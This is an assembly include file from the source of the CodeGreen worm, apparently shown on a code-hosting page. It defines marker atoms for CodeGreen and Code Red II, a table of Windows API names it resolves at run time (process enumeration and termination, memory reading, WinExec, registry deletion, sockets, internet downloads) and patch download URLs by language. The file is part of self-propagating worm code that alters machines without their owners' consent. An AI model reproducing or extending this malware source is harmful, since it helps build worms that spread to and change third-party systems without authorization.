📄 codegreen_variablen.inc
字号:
Str_GetProcAddr DB "GetProcAddress", 0
Len_GetProcAddr EQU 0Fh
Str_LoadLibrary DB "LoadLibraryA", 0
; *** globalVars ***
DLError DB 0
CGAtom DB "CodeGreen", 0
CRIIAtom DB "CodeRedII", 0
MAX_NR_OF_THREADS EQU 50
; *** LoadedDlls ***
;DB "kernel32.dll", 0
Str_Advapi DB "advapi32.dll", 0
Str_User DB "user32.dll", 0
Str_WSock DB "wsock32.dll", 0
Str_WinInet DB "wininet.dll", 0
DllTable DD 5 DUP (0) ;Kernel, Advapi, User, WSock, WinInet
; *** LoadedProcs ***
ProcTable DD 45 DUP (0)
ProcNameTable DB "GetSystemDefaultLangID", 0
DB "GetSystemTime", 0
DB "CreateThread", 0
DB "VirtualAlloc", 0
DB "VirtualProtect", 0
DB "VirtualFree", 0
DB "GetTempPathA", 0
DB "CreateFileA", 0
DB "WriteFile", 0
DB "CloseHandle", 0
DB "GlobalFindAtomA", 0
DB "GlobalAddAtomA", 0
DB "FindAtomA", 0
DB "AddAtomA", 0
DB "SetFileAttributesA", 0
DB "DeleteFileA", 0
DB "CreateToolhelp32Snapshot", 0
DB "Process32First", 0
DB "Process32Next", 0
DB "OpenProcess", 0
DB "ReadProcessMemory", 0
DB "TerminateProcess", 0
DB "Sleep", 0
DB "WinExec", 0
DB "InitializeCriticalSection", 0
DB "EnterCriticalSection", 0
DB "LeaveCriticalSection", 0
DB "DeleteCriticalSection", 0
DB "ExitThread", 0
DB "MoveFileA", 0
DB 0
DB "RegOpenKeyExA", 0
DB "RegDeleteValueA", 0
DB "RegCloseKey", 0
DB 0
DB "MessageBoxA", 0
DB 0
DB "socket", 0
DB "ioctlsocket", 0
DB "connect", 0
DB "select", 0
DB "send", 0
DB "closesocket", 0
DB 0
DB "InternetOpenA", 0
DB "InternetOpenUrlA", 0
DB "InternetReadFile", 0
DB "InternetCloseHandle", 0
DB 0
DB 0
API_GetProcAddr EQU 0
API_LoadLibrary EQU 4
API_GetSystemDefaultLangID EQU 8
API_GetSystemTime EQU 12
API_CreateThread EQU 16
API_VirtualAlloc EQU 20
API_VirtualProtect EQU 24
API_VirtualFree EQU 28
API_GetTempPath EQU 32
API_CreateFile EQU 36
API_WriteFile EQU 40
API_CloseHandle EQU 44
API_GlobalFindAtom EQU 48
API_GlobalAddAtom EQU 52
API_FindAtom EQU 56
API_AddAtom EQU 60
API_SetFileAttributes EQU 64
API_DeleteFile EQU 68
API_CreateToolhelp32Snapshot EQU 72
API_Process32First EQU 76
API_Process32Next EQU 80
API_OpenProcess EQU 84
API_ReadProcessMemory EQU 88
API_TerminateProcess EQU 92
API_Sleep EQU 96
API_WinExec EQU 100
API_InitializeCriticalSection EQU 104
API_EnterCriticalSection EQU 108
API_LeaveCriticalSection EQU 112
API_DeleteCriticalSection EQU 116
API_ExitThread EQU 120
API_MoveFile EQU 124
API_RegOpenKeyEx EQU 128
API_RegDeleteValue EQU 132
API_RegCloseKey EQU 136
API_MessageBox EQU 140
API_socket EQU 144
API_ioctlsocket EQU 148
API_connect EQU 152
API_select EQU 156
API_send EQU 160
API_closesocket EQU 164
API_NetOpen EQU 168
API_NetOpenUrl EQU 172
API_NetReadFile EQU 176
API_NetCloseHandle EQU 180
; *** patch routine ***
;if an exploit for NT4 came out, we might need this:
;DLUrlNT4 DB "http://download.microsoft.com/download/winntsp/Patch/q300972/NT4/", 0 ;"EN-US/"
;DLUrlNT4_2 DB "Q300972i.exe", 0 ;"AR/ARA"
;
;NT4UrlTable DB "AR/ARA", 0 ;arabic
; DB 0
; DB "CN/CHS", 0 ;chinese (simplified)
; DB "TW/CHT", 0 ;chinese (traditional)
; DB 0
; DB 0
; DB "DE/DEU", 0 ;german
; DB 0
; DB "EN-US/", 0 ;english
; DB "ES/ESP", 0 ;spanish
; DB 0
; DB "FR/FRA", 0 ;french
; DB "HE/HEB", 0 ;hebrew
; DB 0
; DB 0
; DB 0 ;italian
; DB "JA/JPN", 0 ;janpanese
; DB "KO/KOR", 0 ;korean
; DB "NL/NLD", 0 ;dutch
; DB 0
; DB 0
; DB "PT-BR/ptb", 0 ;portuguese
; DB "PT-BR/ptb", 0 ;portuguese (brazilian)
; DB 0
; DB 0
; DB 0
; DB 0
; DB 0
; DB "SV/SVE", 0 ;swedish
; DB "TH/THA", 0 ;thai
; DB 0 ;31 Entries
DLUrlNT5 DB "http://a", 0 ;"131"
DLUrlNT5_2 DB ".ms.a.microsoft.com/f/", 0 ;"131"
DLUrlNT5_3 DB "/1611/2h/download.microsoft.com/download/win2000platform/Patch/q300972/NT5/", 0 ;"EN-US"
DLUrlNT5_4 DB "/Q300972_W2K_SP3_x86_", 0 ;"en"
; 0/- : patch not available ;0: LANG_NEUTRAL
NT5UrlTable DB "134AR", 0 ;1: LANG_ARABIC
DB 0 ;2: - (LANG_BULGARIAN)
DB "138CN", 0 ;3: LANG_CHINESE_SIMPLIFIED
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -